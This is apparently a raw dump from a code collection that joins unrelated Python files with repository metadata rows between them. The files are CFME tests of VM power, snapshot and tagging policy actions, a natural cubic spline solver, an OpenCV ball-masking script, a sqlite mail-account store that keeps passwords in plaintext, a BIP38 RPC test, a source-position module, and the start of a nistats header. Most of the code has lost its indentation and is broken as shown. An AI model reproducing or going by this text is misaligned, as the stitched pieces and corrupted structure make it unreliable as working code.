vm.start_vm()
vm.wait_vm_running()
# Make sure the state is consistent
vm.crud.refresh_relationships(from_details=True)
vm.crud.wait_for_vm_state_change(desired_state=vm.crud.STATE_ON, from_details=True)
return vm
@pytest.fixture(scope="function")
def vm_off(provider, vm):
""" Ensures that the VM is off when the control goes to the test."""
vm.wait_vm_steady()
if provider.one_of(InfraProvider, AzureProvider, OpenStackProvider) and vm.is_vm_suspended():
vm.start_vm()
vm.wait_vm_running()
if not vm.is_vm_stopped():
vm.stop_vm()
vm.wait_vm_stopped()
# Make sure the state is consistent
vm.crud.refresh_relationships(from_details=True)
vm.crud.wait_for_vm_state_change(desired_state=vm.crud.STATE_OFF, from_details=True)
return vm
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_start_virtual_machine_after_stopping(request, vm, vm_on, policy_for_testing):
""" This test tests action 'Start Virtual Machine'
This test sets the policy that it turns on the VM when it is turned off
    (https://www.youtube.com/watch?v=UOn4gxj2Dso), then turns the VM off and waits for it to come
    back alive.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power Off", ["Start Virtual Machine"])
request.addfinalizer(policy_for_testing.assign_events)
# Stop the VM
vm.stop_vm()
# Wait for VM powered on by CFME
try:
wait_for(vm.is_vm_running, num_sec=600, delay=5)
except TimedOutError:
pytest.fail("CFME did not power on the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_stop_virtual_machine_after_starting(request, vm, vm_off, policy_for_testing):
""" This test tests action 'Stop Virtual Machine'
This test sets the policy that it turns off the VM when it is turned on
    (https://www.youtube.com/watch?v=UOn4gxj2Dso), then turns the VM on and waits for it to come
    back off.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Stop Virtual Machine"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
# Wait for VM powered off by CFME
try:
wait_for(vm.is_vm_stopped, num_sec=600, delay=5)
except TimedOutError:
pytest.fail("CFME did not power off the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_suspend_virtual_machine_after_starting(request, vm, vm_off, policy_for_testing):
""" This test tests action 'Suspend Virtual Machine'
    This test sets the policy that it suspends the VM when it's turned on. Then it powers on the
    VM, waits for it to come alive and then waits for the VM to be suspended.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Suspend Virtual Machine"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
# Wait for VM be suspended by CFME
try:
wait_for(vm.is_vm_suspended, num_sec=600, delay=5)
except TimedOutError:
pytest.fail("CFME did not suspend the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_prevent_event(request, vm, vm_off, policy_for_testing):
""" This test tests action 'Prevent current event from proceeding'
    This test sets the policy that it prevents powering the VM up. Then the VM is powered up
    and the test waits to verify that the VM does not come alive.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On Request",
["Prevent current event from proceeding"])
request.addfinalizer(policy_for_testing.assign_events)
# Request VM's start (through UI)
vm.crud.power_control_from_cfme(option=vm.crud.POWER_ON, cancel=False)
try:
wait_for(vm.is_vm_running, num_sec=600, delay=5)
except TimedOutError:
pass # VM did not start, so that's what we want
else:
pytest.fail("CFME did not prevent starting of the VM {}".format(vm.name))
@pytest.mark.meta(blockers=[1439331])
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_prevent_vm_retire(request, vm, vm_on, policy_for_testing):
"""This test sets the policy that prevents VM retiring.
Metadata:
test_flag: actions, provision
"""
policy_for_testing.assign_actions_to_event("VM Retire Request",
["Prevent current event from proceeding"])
request.addfinalizer(policy_for_testing.assign_events)
vm.crud.retire()
try:
wait_for(lambda: vm.crud.is_retired, num_sec=600, delay=15)
except TimedOutError:
pass
else:
pytest.fail("CFME did not prevent retire of the VM {}".format(vm.name))
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_prevent_ssa(request, appliance, configure_fleecing, vm, vm_on, policy_for_testing):
"""Tests preventing Smart State Analysis.
This test sets the policy that prevents VM analysis.
https://bugzilla.redhat.com/show_bug.cgi?id=1433084
Metadata:
test_flag: actions, provision
"""
policy_for_testing.assign_actions_to_event("VM Analysis Request",
["Prevent current event from proceeding"])
request.addfinalizer(policy_for_testing.assign_events)
vm.crud.load_details()
wait_for_ssa_enabled()
try:
do_scan(vm.crud)
except TimedOutError:
rc, _ = appliance.ssh_client.run_command("grep 'Prevent current event from proceeding.*"
"VM Analysis Request.*{}' /var/www/miq/vmdb/log/policy.log".format(vm.name))
assert rc == 0, "Action \"Prevent current event from proceeding\" hasn't been invoked"
else:
pytest.fail("CFME did not prevent analysing the VM {}".format(vm.name))
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_power_on_logged(request, vm, vm_off, appliance, policy_for_testing):
""" This test tests action 'Generate log message'.
    This test sets the policy that it logs powering on of the VM. Then it powers up the VM and
    checks whether the logs contain a message about that.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Generate log message"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
policy_desc = policy_for_testing.description
# Search the logs
def search_logs():
rc, stdout = appliance.ssh_client.run_command(
"cat /var/www/miq/vmdb/log/policy.log | grep '{}'".format(policy_desc))
if rc != 0: # Nothing found, so shortcut
return False
for line in stdout.strip().split("\n"):
if "Policy success" not in line:
continue
match_string = "policy: [{}], event: [VM Power On], entity name: [{}]".format(
policy_desc, vm.name)
if match_string in line:
logger.info("Found corresponding log message: %s", line.strip())
return True
else:
return False
wait_for(search_logs, num_sec=180, message="log search")
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_power_on_audit(request, vm, vm_off, appliance, policy_for_testing):
""" This test tests action 'Generate Audit Event'.
    This test sets the policy that it logs powering on of the VM. Then it powers up the VM and
    checks whether the audit logs contain a message about that.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Generate Audit Event"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
policy_desc = policy_for_testing.description
# Search the logs
def search_logs():
rc, stdout = appliance.ssh_client.run_command(
"cat /var/www/miq/vmdb/log/audit.log | grep '{}'".format(policy_desc)
)
if rc != 0: # Nothing found, so shortcut
return False
for line in stdout.strip().split("\n"):
if "Policy success" not in line or "MiqAction.action_audit" not in line:
continue
match_string = "policy: [{}], event: [VM Power On]".format(policy_desc)
if match_string in line:
logger.info("Found corresponding log message: %s", line.strip())
return True
else:
return False
wait_for(search_logs, num_sec=180, message="log search")
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_create_snapshot_and_delete_last(request, action_collection,
vm, vm_on, policy_for_testing):
""" This test tests actions 'Create a Snapshot' (custom) and 'Delete Most Recent Snapshot'.
    This test sets the policy that it makes a snapshot of the VM after it's powered off and, when
    it is powered back on, deletes the last snapshot.
Metadata:
test_flag: actions, provision
"""
if not hasattr(vm.crud, "total_snapshots"):
pytest.skip("This provider does not support snapshots yet!")
# Set up the policy and prepare finalizer
snapshot_name = fauxfactory.gen_alphanumeric()
snapshot_create_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Create a Snapshot",
action_values={"snapshot_name": snapshot_name}
)
policy_for_testing.assign_actions_to_event("VM Power Off", [snapshot_create_action])
policy_for_testing.assign_actions_to_event("VM Power On", ["Delete Most Recent Snapshot"])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
snapshot_create_action.delete()
snapshots_before = vm.crud.total_snapshots
# Power off to invoke snapshot creation
vm.stop_vm()
wait_for(lambda: vm.crud.total_snapshots > snapshots_before, num_sec=800,
message="wait for snapshot appear", delay=5)
assert vm.crud.current_snapshot_description == "Created by EVM Policy Action"
assert vm.crud.current_snapshot_name == snapshot_name
# Snapshot created and validated, so let's delete it
snapshots_before = vm.crud.total_snapshots
# Power on to invoke last snapshot deletion
vm.start_vm()
wait_for(lambda: vm.crud.total_snapshots < snapshots_before, num_sec=800,
message="wait for snapshot deleted", delay=5)
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_create_snapshots_and_delete_them(request, action_collection, vm, vm_on,
policy_for_testing):
""" This test tests actions 'Create a Snapshot' (custom) and 'Delete all Snapshots'.
    This test sets the policy that it makes a snapshot of the VM after it's powered off and then
    cycles several times so that it generates a couple of snapshots. Then the 'Delete all Snapshots' is
assigned to power on event, VM is powered on and it waits for all snapshots to disappear.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
snapshot_name = fauxfactory.gen_alphanumeric()
snapshot_create_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Create a Snapshot",
action_values={"snapshot_name": snapshot_name}
)
policy_for_testing.assign_actions_to_event("VM Power Off", [snapshot_create_action])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
snapshot_create_action.delete()
def create_one_snapshot(n):
"""
Args:
n: Sequential number of snapshot for logging.
"""
# Power off to invoke snapshot creation
snapshots_before = vm.crud.total_snapshots
vm.stop_vm()
wait_for(lambda: vm.crud.total_snapshots > snapshots_before, num_sec=800,
message="wait for snapshot %d to appear" % (n + 1), delay=5)
current_snapshot = vm.crud.current_snapshot_name
logger.debug('Current Snapshot Name: {}'.format(current_snapshot))
assert current_snapshot == snapshot_name
vm.start_vm()
for i in range(4):
create_one_snapshot(i)
policy_for_testing.assign_events()
vm.stop_vm()
policy_for_testing.assign_actions_to_event("VM Power On", ["Delete all Snapshots"])
# Power on to invoke all snapshots deletion
vm.start_vm()
wait_for(lambda: vm.crud.total_snapshots == 0, num_sec=800,
message="wait for snapshots to be deleted", delay=5)
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_initiate_smartstate_analysis(request, configure_fleecing, vm, vm_off,
policy_for_testing):
""" This test tests actions 'Initiate SmartState Analysis for VM'.
This test sets the policy that it analyses VM after it's powered on. Then it checks whether
that really happened.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On",
["Initiate SmartState Analysis for VM"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.crud.power_control_from_cfme(option=vm.crud.POWER_ON, cancel=False, from_details=True)
vm.crud.load_details()
wait_for_ssa_enabled()
try:
do_scan(vm.crud)
except TimedOutError:
pytest.fail("CFME did not finish analysing the VM {}".format(vm.name))
# TODO: Rework to use REST
# def test_action_raise_automation_event(
# request, policy_for_testing, vm, vm_on, ssh_client, vm_crud_refresh):
# """ This test tests actions 'Raise Automation Event'.
# This test sets the policy that it raises an automation event VM after it's powered on.
# Then it checks logs whether that really happened.
# Metadata:
# test_flag: actions, provision
# """
# # Set up the policy and prepare finalizer
# policy_for_testing.assign_actions_to_event("VM Power Off", ["Raise Automation Event"])
# request.addfinalizer(lambda: policy_for_testing.assign_events())
# # Start the VM
# vm.stop_vm()
# vm_crud_refresh()
# # Search the logs
# def search_logs():
# rc, stdout = ssh_client.run_command(
# "cat /var/www/miq/vmdb/log/automation.log | grep 'MiqAeEvent.build_evm_event' |"
# " grep 'event=<\"vm_poweroff\">' | grep 'id: {}'".format(vm.api.object.id)
# # not guid, but the ID
# )
# if rc != 0: # Nothing found, so shortcut
# return False
# found = [event for event in stdout.strip().split("\n") if len(event) > 0]
# if not found:
# return False
# else:
# logger.info("Found event: `%s`", event[-1].strip())
# return True
# wait_for(search_logs, num_sec=180, message="log search")
# Purely custom actions
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_tag(request, vm, vm_off, policy_for_testing, action_collection):
""" Tests action tag
Metadata:
test_flag: actions, provision
"""
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
tag_assign_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Tag",
action_values={"tag": ("My Company Tags", "Service Level", "Gold")}
)
policy_for_testing.assign_actions_to_event("VM Power On", [tag_assign_action])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
tag_assign_action.delete()
vm.start_vm()
try:
wait_for(
lambda: any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()),
num_sec=600,
message="tag presence check"
)
except TimedOutError:
pytest.fail("Tags were not assigned!")
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_untag(request, vm, vm_off, policy_for_testing, action_collection):
""" Tests action untag
Metadata:
test_flag: actions, provision
"""
if not any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.add_tag("Service Level", "Gold")
@request.addfinalizer
def _remove_tag():
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
tag_unassign_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Remove Tags",
action_values={"remove_tag": ["Service Level"]}
)
policy_for_testing.assign_actions_to_event("VM Power On", [tag_unassign_action])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
tag_unassign_action.delete()
vm.start_vm()
try:
wait_for(
lambda: not any(tag.category.display_name == "Service Level" and
tag.display_name == "Gold" for tag in vm.crud.get_tags()),
num_sec=600,
message="tag presence check"
)
except TimedOutError:
pytest.fail("Tags were not unassigned!")
@pytest.mark.provider([VMwareProvider], scope="module")
@pytest.mark.meta(blockers=[1381255])
def test_action_cancel_clone(appliance, request, provider, vm_name, vm_big, policy_for_testing):
"""This test checks if 'Cancel vCenter task' action works.
    For this test we need a big template, otherwise CFME won't have enough time
    to cancel the task. See https://bugzilla.redhat.com/show_bug.cgi?id=1383372#c9
"""
with update(policy_for_testing):
policy_for_testing.scope = (
"fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_big.name))
policy_for_testing.assign_events("VM Clone Start")
policy_for_testing.assign_actions_to_event(
"VM Clone Start", ["Cancel vCenter Task"])
clone_vm_name = "{}-clone".format(vm_big.name)
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
with update(policy_for_testing):
policy_for_testing.scope = (
"fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_name))
cleanup_vm(clone_vm_name, provider)
vm_big.crud.clone_vm(fauxfactory.gen_email(), "first", "last", clone_vm_name, "VMware")
request_description = clone_vm_name
clone_request = appliance.collections.requests.instantiate(description=request_description,
partial_check=True)
clone_request.wait_for_request(method='ui')
assert clone_request.status == "Error"
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_check_compliance(request, provider, vm, vm_name, policy_for_testing):
"""Tests action "Check Host or VM Compliance". Policy profile should have control and compliance
policies. Control policy initiates compliance check and compliance policy determines is the vm
compliant or not. After reloading vm details screen the compliance status should be changed.
"""
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
@request.addfinalizer
def _remove_tag():
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
policy_for_testing.assign_actions_to_event("Tag Complete", ["Check Host or VM Compliance"])
request.addfinalizer(policy_for_testing.assign_events)
vm.crud.add_tag("Service Level", "Gold")
view = navigate_to(vm.crud, "Details")
view.toolbar.reload.click()
assert vm.crud.compliant
| gpl-2.0 | -4,068,996,813,163,299,300 | 36.584653 | 100 | 0.667304 | false |
saisai/algorithms_by_other | splinte-interplation/spline-interpolation.py | 1 | 2896 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def niceCubicPolynomial(p):
tmp = ""
if p["a"] == 1:
tmp += " x^3"
elif p["a"] != 0:
tmp += "%.2fx^3" % p["a"]
if p["b"] == 1:
tmp += "\t+ x^2"
elif p["b"] != 0:
tmp += "\t+ %.2fx^2" % p["b"]
else:
tmp += "\t\t"
if p["c"] == 1:
tmp += "\t+ x"
elif p["c"] != 0:
tmp += "\t+ %.2fx" % p["c"]
else:
tmp += "\t\t"
if p["d"] != 0:
tmp += "\t+ %.2f" % p["d"]
return tmp
def getSpline(points):
""" points should be a list of maps,
where each map represents a point and has "x" and "y" """
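    # A natural cubic spline with n segments has 4n unknown coefficients, so
    # we assemble a 4n x 4n linear system Ax = b from:
    #   (S2) 2n interpolation conditions: each segment passes through both
    #        of its endpoints,
    #   (S3) 2n-2 smoothness conditions: first and second derivatives match
    #        at the n-1 inner points,
    # plus 2 "natural" boundary conditions (zero second derivative at the
    # outer points), and solve it with scipy.linalg.solve.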
import numpy, scipy.linalg
# sort points by x value
points = sorted(points, key=lambda point: point["x"])
n = len(points) - 1
# Set up a system of equations of form Ax=b
A = numpy.zeros(shape=(4*n,4*n))
b = numpy.zeros(shape=(4*n,1))
for i in range(0, n):
        # 2n equations from conditions (S2)
A[i][4*i+0] = points[i]["x"]**3
A[i][4*i+1] = points[i]["x"]**2
A[i][4*i+2] = points[i]["x"]
A[i][4*i+3] = 1
b[i] = points[i]["y"]
A[n+i][4*i+0] = points[i+1]["x"]**3
A[n+i][4*i+1] = points[i+1]["x"]**2
A[n+i][4*i+2] = points[i+1]["x"]
A[n+i][4*i+3] = 1
b[n+i] = points[i+1]["y"]
# 2n-2 equations for (S3):
if i == 0:
continue
# point i is an inner point
A[2*n+(i-1)][4*(i-1)+0] = 3*points[i]["x"]**2
A[2*n+(i-1)][4*(i-1)+1] = 2*points[i]["x"]
A[2*n+(i-1)][4*(i-1)+2] = 1
A[2*n+(i-1)][4*(i-1)+0+4] = -3*points[i]["x"]**2
A[2*n+(i-1)][4*(i-1)+1+4] = -2*points[i]["x"]
A[2*n+(i-1)][4*(i-1)+2+4] = -1
b[2*n+(i-1)] = 0
A[3*n+(i-1)][4*(i-1)+0] = 6*points[i]["x"]
A[3*n+(i-1)][4*(i-1)+1] = 2
A[3*n+(i-1)][4*(i-1)+0+4] = -6*points[i]["x"]
A[3*n+(i-1)][4*(i-1)+1+4] = -2
b[3*n+(i-1)] = 0
# Natural spline:
A[3*n-1+0][0+0] += 6*points[0]["x"]
A[3*n-1+0][0+1] += 2
b[3*n-1+0] += 0
A[3*n+n-1][4*(n-1)+0] += 6*points[n]["x"]
A[3*n+n-1][4*(n-1)+1] += 2
b[3*n+n-1] += 0
x = scipy.linalg.solve(A, b)
spline = []
for i in range(0, n):
spline.append({"u": points[i]["x"], "v": points[i+1]["x"],
"a": float(x[4*i+0]),
"b": float(x[4*i+1]),
"c": float(x[4*i+2]),
"d": float(x[4*i+3])})
return spline
if __name__ == "__main__":
points = []
points.append({"x": 0.0, "y": -4})
points.append({"x": 1.0, "y": 9})
points.append({"x": 2.0, "y": 35})
points.append({"x": 3.0, "y": 70})
spline = getSpline(points)
for p in spline:
tmp = "[%.2f, %.2f]:" % (p["u"], p["v"])
tmp += niceCubicPolynomial(p)
print(tmp)
| mit | -5,942,451,878,458,563,000 | 27.96 | 66 | 0.397099 | false |
Edeleon4/PoolShark | scripts/hist.py | 1 | 2214 | import cv2
import numpy as np
frame = cv2.imread('/mnt/c/Users/T-HUNTEL/Desktop/hackathon/table3.jpg')
h,w,c = frame.shape
print frame.shape
# Convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
BORDER_COLOR = 0
def flood_fill(image, x, y, value):
    """Flood fill on a region of non-BORDER_COLOR pixels.
    x indexes rows (image.shape[0]) and y indexes columns (image.shape[1]),
    matching the (row, col) order used at the call site below.
    """
    count = 1
    points = [(x, y)]
    if x >= image.shape[0] or y >= image.shape[1] or image[x, y] == BORDER_COLOR:
        return None, None
    edge = [(x, y)]
    image[x, y] = value
    while edge:
        newedge = []
        for (x, y) in edge:
            for (s, t) in ((x+1, y), (x-1, y), (x, y+1), (x, y-1)):
                if 0 <= s < image.shape[0] and 0 <= t < image.shape[1] and \
                   image[s, t] not in (BORDER_COLOR, value):
                    image[s, t] = value
                    points.append((s, t))
                    count += 1
                    newedge.append((s, t))
        edge = newedge
    return count, points
# thresholds for different balls / background
low_bkg = np.array([15, 40, 50], dtype=np.uint8)
high_bkg = np.array([40, 190, 200], dtype=np.uint8)
lower_blue = np.array([110,50,50], dtype=np.uint8)
upper_blue = np.array([130,255,255], dtype=np.uint8)
low_yellow = np.array([20, 30, 30], dtype=np.uint8)
high_yellow = np.array([30, 255, 255], dtype=np.uint8)
# mask out the background
mask = cv2.inRange(hsv, low_bkg, high_bkg)
mask = np.invert(mask)
# Bitwise-AND mask and original image
objects = cv2.bitwise_and(frame,frame, mask= mask)
hsv = cv2.cvtColor(objects, cv2.COLOR_BGR2HSV)
# mask the yellow balls
mask = cv2.inRange(hsv, low_yellow, high_yellow)
yellows = cv2.bitwise_and(objects, objects, mask=mask)
# find the biggest cloud of 1's in the yellow mask
biggest_cloud = []
biggest_count = 0
image = mask / 255.
while len(np.where(image == 1)[0]) > 0:
loc = np.where(image == 1)
y = loc[0][0]
x = loc[1][0]
count, cloud = flood_fill(image, y, x, 2)
if count > biggest_count:
print count
biggest_count = count
biggest_cloud = cloud
print biggest_cloud
print biggest_count
cv2.imwrite('mask.jpg', mask)
cv2.imwrite('yellows.jpg', yellows)
cv2.imwrite('frame.jpg', frame)
| mit | -4,887,612,138,901,576,000 | 25.357143 | 80 | 0.604788 | false |
TilgalisToms/TMail | database.py | 1 | 4090 | import sqlite3
class Database:
configArray = {}
def __init__(self):
self.connect()
self.checkAndCreateTables()
# self.getConfig()
def connect(self):
self.db = sqlite3.connect('accounts.db')
def checkAndCreateTables(self):
self.connect()
c = self.db.cursor()
# c.execute('DROP TABLE `mailbox`')
c.execute('CREATE TABLE IF NOT EXISTS `mailbox` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `address` VARCHAR(255), `password` VARCHAR(255),`title` VARCHAR(255))')
c.execute('CREATE TABLE IF NOT EXISTS `config` (`sid` varchar(32) PRIMARY KEY, `value` VARCHAR(255))')
c.execute('CREATE TABLE IF NOT EXISTS `message` (`id` INTEGER PRIMARY KEY, `folder` VARCHAR(32), `html` TEXT, `sender` VARCHAR(255), `title` TEXT, `received` DATETIME, `read` INTEGER(1))')
self.db.commit()
self.db.close()
def getMailboxes(self):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `mailbox` ORDER BY `id` ASC')
results = c.fetchall()
array = {}
for result in results:
row = {
'id': result[0],
'address': result[1],
'password': result[2],
                'title': result[3]
}
array[result[0]] = row
self.db.close()
return array
def getMailbox(self,id):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `mailbox` WHERE `id`=?',(id, ))
results = c.fetchone()
array = {
'id':results[0],
'address':results[1],
'password':results[2],
            'title':results[3]
}
self.db.close()
return array
def getConfig(self):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `config`')
configArray = c.fetchall()
for item in configArray:
self.configArray[item[0]] = item[1]
self.db.close()
def getConfigValue(self, sid):
        value = self.configArray.get(sid)
        if value is not None:
            return value
        else:
            return False
def setConfigValue(self, sid, value):
self.connect()
c = self.db.cursor()
        if self.configArray.get(sid) is not None:
c.execute('UPDATE `config` SET `value`=? WHERE `sid`=?', (value, sid,))
else:
c.execute('INSERT OR IGNORE INTO `config` VALUES (?,?)',(sid,value,))
self.db.commit()
self.db.close()
self.configArray[sid] = value
def removeMailbox(self,id):
self.connect()
c = self.db.cursor()
c.execute('DELETE FROM `mailbox` WHERE `id`=?',(id,))
self.db.commit()
self.db.close()
def createAccount(self,data):
self.connect()
c = self.db.cursor()
c.execute('INSERT INTO `mailbox` (`address`,`password`,`title`) VALUES (?,?,?)', (
data['email'], data['password'], data['title'],
))
self.db.commit()
self.db.close()
def saveAccount(self,id,data):
self.connect()
c = self.db.cursor()
c.execute('UPDATE `mailbox` SET `address`=?, `password`=?, `title`=? WHERE `id`=?',(
data['email'],data['password'],data['title'],id,
))
self.db.commit()
self.db.close()
def getMessages(self,folder):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `message` WHERE `folder`=?',(folder, ))
array = {}
results = c.fetchall()
for result in results:
item = {}
item['id'] = result[0]
item['html'] = result[2]
item['sender'] = result[3]
item['title'] = result[4]
item['received'] = result[5]
item['read'] = result[6] == 1
array[result[0]] = item
self.db.close()
        return array
| gpl-3.0 | -5,152,533,714,615,267,000 | 30.713178 | 196 | 0.516137 | false |
SyndicateLtd/SyndicateQT | test/functional/rpc_bip38.py | 1 | 1058 | #!/usr/bin/env python3
# Copyright (c) 2018 The PIVX developers
# Copyright (c) 2018 The Syndicate Ltd developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class Bip38Test(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
password = 'test'
address = self.nodes[0].getnewaddress()
privkey = self.nodes[0].dumpprivkey(address)
self.log.info('encrypt address %s' % (address))
bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
self.log.info('decrypt bip38 key %s' % (bip38key))
assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
if __name__ == '__main__':
Bip38Test().main()
| mit | -5,341,882,262,782,369,000 | 36.785714 | 88 | 0.695652 | false |
arypbatista/gobspy | gobspyide/common/position.py | 1 | 4075 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2017 Ary Pablo Batista <[email protected]>, Pablo Barenbaum <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import common.i18n as i18n
from common.utils import *
#### Tracking of positions inside source files.
####
#### ProgramElements are elements inside a program, typically
#### tokens or AST nodes.
####
#### ProgramAreas are specific regions of the program, such
#### as the area after a given token.
class ProgramElement(object):
"""Represents an element inside a program. Subclasses should implement:
pos_begin: starting position
pos_end: final position
description(): human readable description"""
def source(self):
return self.pos_begin.string[self.pos_begin.start:self.pos_end.start]
class Position(object):
"Represents a position in a source file or string."
def __init__(self, string, filename='...', start=0, row=1, col=1):
self.string = string
self._filename = filename
self.start = start
self.row = row
self.col = col
def after_reading(self, string):
"""Returns the position that results after reading the characters
in the string."""
new_start = self.start + len(string)
newlines = string.count('\n')
new_row = self.row + newlines
if newlines == 0:
new_col = self.col + len(string)
else:
new_col = len(string) - string.rindex('\n')
return Position(self.string, self._filename, new_start, new_row, new_col)
def __repr__(self):
return '%s:%s:%s' % (self._filename, self.row, self.col)
def filename(self):
return self._filename
def row_col(self):
return '%s %s, %s %s' % (i18n.i18n('line'), self.row, i18n.i18n('column'), self.col)
def file_row_col(self):
return '%s (%s)' % (self.filename(), self.row_col())
def file_row(self):
return '(%s:%s)' % (self.filename(), self.row)
def line_before(self):
try:
r = self.string.rindex('\n', 0, self.start)
res = self.string[r + 1:self.start]
except ValueError:
res = self.string[:self.start]
return expand_tabs(res)
def two_lines_after(self):
try:
r1 = self.string.index('\n', self.start)
l1 = self.string[self.start:r1]
try:
r2 = self.string.index('\n', r1 + 1)
l2 = self.string[r1+1:r2]
res = [l1, l2]
except ValueError:
res = [l1]
except ValueError:
res = [self.string[self.start:]]
return map(expand_tabs, res)
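# Illustrative sketch (added for exposition; not used by the module): reading
# text through a Position advances the row/column bookkeeping, e.g.
#   pos = Position('ab\ncd', filename='demo')
#   pos2 = pos.after_reading('ab\nc')
#   # pos2.start == 4, pos2.row == 2, pos2.col == 2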
class ProgramArea(object):
"Represents an area of a program."
def __repr__(self): return '(...)'
class ProgramAreaNear(ProgramArea):
"""Represents the area of a program that occurs near the beggining of
a given program element."""
def __init__(self, elem):
self.elem = elem
def __repr__(self):
l1 = '%s\n%s %s' % (self.elem.pos_begin.file_row_col(),
i18n.i18n('near'), self.elem.description())
before = self.elem.pos_begin.line_before()
after = self.elem.pos_end.two_lines_after()
ind = ' ' * len(before)
l2 = ind + '|' + '\n' + ind + 'V'
src = self.elem.source()
if len(src) < 50:
l3 = '%s%s%s' % (before, src, after[0])
if len(after) > 1: l3 += '\n'
else:
l3 = '%s%s' % (before, src[:50])
if src[-1] != '\n': l3 += '...\n'
return '\n'.join(['--', l1, l2, l3, '--'])
def interval(self):
return self.elem.pos_begin, self.elem.pos_end
def filename(self):
return self.elem.pos_begin.filename()
| gpl-3.0 | 1,046,354,306,264,107,000 | 33.82906 | 103 | 0.637301 | false |
nistats/nistats | nistats/design_matrix.py | 1 | 17077 | """
This module implements fMRI Design Matrix creation.
Design matrices are represented by Pandas DataFrames
Computations of the different parts of the design matrix are confined
